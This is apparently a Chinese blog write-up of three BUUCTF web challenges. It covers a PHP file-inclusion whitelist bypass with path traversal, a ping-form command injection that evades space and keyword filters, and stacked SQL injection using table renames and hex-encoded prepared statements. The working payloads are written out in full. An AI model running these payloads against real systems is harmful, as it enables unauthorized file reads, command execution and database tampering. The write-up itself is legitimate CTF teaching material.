【Web】buuctf write up day 1

已于 2024-01-08 14:43:10 修改
阅读量805 收藏 25
点赞数 16
分类专栏: # Web 网络安全技能Tree升级(ctf方向) 文章标签: 网络安全
于 2024-01-08 11:40:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A_Gaming/article/details/135449927
版权

文章目录

[HCTF 2018]WarmUp

keywords:php,代码审计
打开只有一张图
在这里插入图片描述

代码检查

  1. 检查代码,发现注释,有个source.php文件,访问它
    在这里插入图片描述
    得到如下代码
    在这里插入图片描述
    在这里插入图片描述
    需要代码审计,粗略看了下,从CheckFile等几个字眼知道,大概是要检查是否有文件、或者是否包含关键字。按照提示,先访问hint.php.。
    在这里插入图片描述
    得到这个页面,提示flag在ffffllllaaaagggg,搞清楚这个ffffllllaaaagggg是变量还是什么文件

代码分析

类emmm分析

part 1:

class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

  1. 传参source.php(如上面代码)和hint.php
    在这里插入图片描述
    需要include ffffllllaaaagggg。

  2. 若_page的值在数组$whitelist中,则返回true。

  3. mb_substr(string $str , int $start , int $length)----
    按照位置截断字符串。

  4. mb_strpos(haystack, needle)----
    查找字符串needle在另一个字符串haystack中首次出现的位置,返回位置(int)

  5. 整体逻辑:将page字符串第一个问号?以前的字符串截下来,保存在$_page中,若_page值为source.php、hint.php则返回true

part 2:

			$_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

_page变量作出如下变化:一次url解码,一次问号截断
注意:url传入服务器会自动进行一次urldecode。?的url编码为%3F,双重url编码为%253F

让函数checkFile返回true

以下三种构造方式均可让emmm::checkFile($_REQUEST[‘file’])返回true:
(1)满足直接传递参数if语句:file=source.php
(2)满足问号截断if语句:file=source.php?xxxxxxxxx
(3)满足url编码后问号截断的if语句:file=source.php%253Fxxxxxxx
.
注:source.php可换成hint.php。

构造payload
 ?file=source.php?/../../../../ffffllllaaaagggg
  ?file=source.php%253F/../../../../ffffllllaaaagggg

原理:
(1)要满足emmm::checkFile($_REQUEST[‘file’])返回true
(2)要include找到文件ffffllllaaaagggg
(3)目录穿越次数暂时不知道?—

疑惑解释

疑惑:source.php?/ 不是文件目录为何能找到ffffllllaaaagggg?
解释:include会将source.php?/看做是一个目录,即使它不存在,只要通过几个 …/ 返回上级目录即可。比如 file=source.php?/aaa/bbb/ccc/../../../../../../../ffffllllaaaagggg 依然可行

正文代码

if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }

满足3个条件,文件被包含:
1.存在文件
2.为字符串
3.emmm::checkFile($_REQUEST[‘file’])返回true

在这里插入图片描述

[GXYCTF2019]Ping Ping Ping

keywords: RCE
在这里插入图片描述
cnm
在这里插入图片描述
过滤了空格
思路:
在这里插入图片描述
用两次url编码尝试

...|cat%2520flag

在这里插入图片描述
过滤了字符串flag
思路:

  1. 编码绕过关键词
  2. 变量拼接绕过关键字

(后来试了下,两次url编码不太方便后续命令,还是用用$IFS$数字比较好)
尝试base64编码

cat$IFS$9flag.php
Y2F0JElGUyQ5ZmxhZy5waHA=

payload:
?ip=1;echo$IFS$9Y2F0JElGUyQ5ZmxhZy5waHA=|base64$IFS$9-d|sh

发现flag在代码里面
在这里插入图片描述

第二种方法:变量拼接
构造payload:

?ip=1;a=fl;b=ag;cat$IFS$9$a$b.php    //fxck ur flag
?ip=1;b=ag;cat$IFS$9fl$b.php             //成功

[强网杯 2019]随便注

在这里插入图片描述

  1. 随便注入, 爆字段数量
1' order by 1;
1' order by 2;
1' order by 3;

在这里插入图片描述
在这里插入图片描述
2. 爆库
在这里插入图片描述
过滤了select
使用堆叠注入

1' ; show database();

在这里插入图片描述
有回显

  1. 爆表
    在这里插入图片描述
  2. 爆字段
1' ; show columns from words;

在这里插入图片描述
没找到什么flag,看看另一个表(没看到东西)
表名为数字时,要用反引号包起来查询

抄大佬作业:
由show的作用可知,words表内就两个字段,一个叫id,一个叫data
并且可以得知,该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。因此我们对表进行改名:
用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的列名id,将flag改名为data。

1' ;rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);

在这里插入图片描述
这里补充一下alter的用法:

//alter可以修改已知表的列
alter table "table_name" add "column_name" type;//添加一个列
alter table "table_name" drop "column_name" type;//删除一个列
alter table "table_name" alter column "column_name" type;//改变列的数据类型
alter table "table_name" change "column1" "column2" type;//改列名
alter table "table_name" rename "column1" to "column2";//改列名

解法2:
由于select被过滤了,因此将select * from ` 1919810931114514``进行十六进制编码,再构造payload。

;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#

知识点:

  1. prepare…from…是预处理语句,会进行编码转换
  2. execute用来执行由SQLPrepare创建的SQL语句。
  3. SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
Playboygenius
关注
专栏目录
[网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解(SSRF、文件上传、SQL注入、代码审计、中国蚁剑)
杨秀璋的专栏
05-13 7971
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章主要介绍5月9日参加津门杯CTF题目知识,包括power_cut、hate_php、Go0SS、HploadHub和easysql,涉及知识点包括备份文件、SSRF、文件上传、SQL注入、302重定位、代码审计、中国蚁剑等。参加比赛真的能学到很多知识,同时这些大佬是真的厉害,自己真的菜,我们只做出来6道题,需要学习的知识非常多,也非常感谢师弟们的努力。人生路上,要珍惜好每一天,努力奋斗
[网络安全提高篇] 一一〇.强网杯CTF的Web Write-Up(上) 寻宝、赌徒、EasyWeb、pop_master
热门推荐
杨秀璋的专栏
06-15 3万+
强网杯作为国内最好的CTF比赛之一,搞安全的博友和初学者都可以去尝试下。整体而言,比赛题目的水准仍然非常高,尤其是RE和PWN,包括Web,所以还是有很多知识点值得我们学习的。最后,非常感谢参考文献的大佬们,尤其是Nu1L战队(推荐VX关注他们),也感谢许多参加比赛的伙伴和博友们。如果您是一名安全初学者,不妨多参加比赛,每一次CTF比赛都能让我们学到很多东西,即使是赛后的WP,也能成长不少。同时有个遗憾,比赛完后题目不能打开复现,将就看吧。
BUUCTF Web WarmUp1
qq_52429415的博客
03-07 722
BUUCTF Web WarmUp1 进入网站后发现什么也没有 按F12查看原代码,发现PHP发现新的PHP(hit.php) 发现flag在ffffllllaaaagggg中 仔细分析代码 因为flag在ffffllllaaaagggg中 为了读到ffffllllaaaagggg 可以加?file=source.php?/ffffllllaaaagggg 因为传入后服务器会自动解一次码 所以第二个问号要自己url加密一次 ?file=source.php%3f/ffffllllaaaagggg 因为后来还
攻防世界-Web进阶区-warmup题解
Jollowin的博客
11-26 876
warmup题解 我们进入到题目界面会看到一张猥琐的笑脸,假装没看到他直接按F12。 这里我们发现了一条线索:source.php。 好家伙,那我们不妨到source.php看一看: 进行代码审计,初步发现我们可以提交一个名为file的变量,若变量file的值为source.php或hint.php则会执行include $_REQUEST[‘file’]。 那我们不妨令file=hint.php看一看。 1.如上图我们发现底部出现了一行提示,那我们现在的目的就变成了让 include $_REQUE
BUUCTF web入门题目每日两道(一)
horiozn1709的博客
02-03 1267
[极客大挑战 2019]EasySQL 1 该题目需要同时输入用户名和密码,在用户名处输入万能密码‘or 1=1 # ,密码处输入任意字符即可得到flag [HCTF 2018]WarmUp 1 php 代码审计问题 首先看页面源码 注意到在body中注释掉了 source.php ,所以我们直接访问source.php 得到源码: <?php highlight_file(__FILE__); classemmm { pu...
XCTF-攻防世界CTF平台-Web类——6、warmup(php中include函数遍历漏洞)
Onlyone_1314的博客
11-15 1616
打开题目地址: 标题栏是Document,只有一张图片,所以我们审计源代码: 有一个source.php打开: 有一段判断页面的代码,还有一个hint.php 提示flag在ffffllllaaaagggg中,应该是另一个文件中,直接访问ffffllllaaaagggg文件是不存在的: 所以我们继续看source.php中的代码: <?php highlight_file(__FILE__); class emmm { public static fu
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3265
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
旧版Bugku-Web题目下载及write up(相对简单).doc
最新发布
08-24
旧版Bugku-Web题目下载及write up(相对简单)
BUUCTF:jarvisoj_level4(write up)
qq_44768749的博客
08-24 996
这里写目录标题0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、部分RELRO保护 0x02 运行 简单的输入一个字符串 0x03 IDA 漏洞点在vulnerable_function输入长度可以造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 第二次栈溢出跳转执行system("/bin/
BUUCTF:bjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1621
BUUCTF:bjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
[BUUCTF] [HCTF 2018] WarmUp
yzl_007的博客
08-16 322
[BUUCTF] [HCTF 2018] WarmUp php 代码审计 打开地址后一个滑稽 老手艺f12 访问source.php <?php highlight_file(__FILE__); //打印代码 class emmm //定义类 emmm { public static function checkFile(&$page) //函数checkFile,参数赋给$fage {
buuctf web 习题解析(1)
2201_75456435的博客
05-24 113
buuctf前六道题解析
攻防世界web进阶区warmup
gongjingege的博客
07-20 881
打开链接后出现的是一个大大的滑稽脸 查看源代码 发现source.php,打开后,发现了hint.php 打开hint.php,发现了flag的位置 是在ffffllllaaaagggg这个文件中(后面会发现这里是暗示四层目录) 继续审计代码,构造payload 从代码中,可以看出经过三层判断,用include构造 第一,不为空 第二,是字符串 第三,checkfile函数检查 而checkfile第一个要求page为字符串,第二判断page为字符串,第二判断page为字符
攻防世界-web-warmup
wuh2333的博客
05-24 398
攻防世界,warmup
Buuctf Web题解
weixin_68029979的博客
04-24 1378
写在前面, 本人小白一枚,记录一下web做题过程,大部分为个人理解可能有些地方写的不够明确还请见谅。当然由于刚入手web题,所以有些题会没有思路,这时会参考其他大佬的题解过程。本文会一直更新,由于是第一次写博客,所以并不知道一篇能写多少,不管怎样会一直更新的。在题解中,可能并没有说清除为什么是这样,什么要这样,其实大部分我也不知道是为什么,但就是这样做,由上所说我是个小白。如果在文中,出现了只有题目没有题解的情况,是因为我还没有学习与之相关的知识,所以先跳过了,但总会写的。
[HCTF 2018]WarmUp1解题思路
旺仔Sec&blog
11-04 742
[HCTF 2018]WarmUp1目录穿越,代码审计解题思路
web | CTF】BUUCTF [HCTF 2018]WarmUp
weixin_46301214的博客
03-03 551
访问一下hint.php文件就告诉我们,flag在 ffffllllaaaagggg 这个文件里。hint.php 是必填的,然后重点来了,想要访问成其他文件,只需要继续拼接?拦截大概意思就是,我们输入:ffffllllaaaagggg。ffffllllaaaagggg == 数组里两个文件名吗?然后你会发现,这TM是五层目录啊,而且本地是无法复现出来的。发现文件,打开访问一下看看,发现是代码审计。这里经验灵感是 四个字,所以是四层目录。
CTF_WP-攻防世界web题解(1),网络安全面试资料集合
碧海朝天素
04-08 884
查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile接下看重点看checkfile函数,白名单被写死,return true的情况只有三种file在白名单中在file末尾加了个?
BUUCTF__[HCTF 2018]WarmUp_题解
风过江南乱的博客
04-24 1564
第一次写题解,以此来做一个学习记录。 首先拿到题目,打开看到一张滑稽 F12查看源代码,获知source.php,并访问,发现是一段php代码,进行代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值